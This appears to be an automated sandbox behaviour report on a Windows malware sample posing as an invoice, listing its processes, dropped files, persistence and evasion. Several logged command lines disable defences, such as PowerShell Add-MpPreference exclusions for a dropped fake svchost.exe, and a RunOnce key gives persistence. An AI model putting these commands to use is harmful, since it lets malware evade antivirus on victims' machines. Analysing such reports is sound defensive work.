Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: CN-Invoice-XXXXX9808-19011143287989.exe

ReversingLabs: Detection: 27%

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: \??\C:\Windows\mscorlib.pdb( source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
Source:	Binary string: .pdb> source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InprocHandler32 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000000.684807713.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp
Source:	Binary string: npMiVisualBasic.pdbT]_ source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968675958.0000000006138000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb2F source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb00 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_0040289F

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 7_2_0040B550 push eax; ret	7_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 7_2_0040B550 push eax; ret	7_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 7_2_0040B50D push ecx; ret	7_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 8_2_0040B550 push eax; ret	8_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 8_2_0040B550 push eax; ret	8_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Code function: 8_2_0040B50D push ecx; ret	8_2_0040B51D
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Code function: 22_2_01BF0BD8 push es; ret	22_2_01BF0BFC

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe			Jump to dropped file
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe			Jump to dropped file

Boot Survival:

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

7_2_00401306

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQL	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQL	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQL	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQL	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe:Zone.Identifier read attributes | delete

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00408E31

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
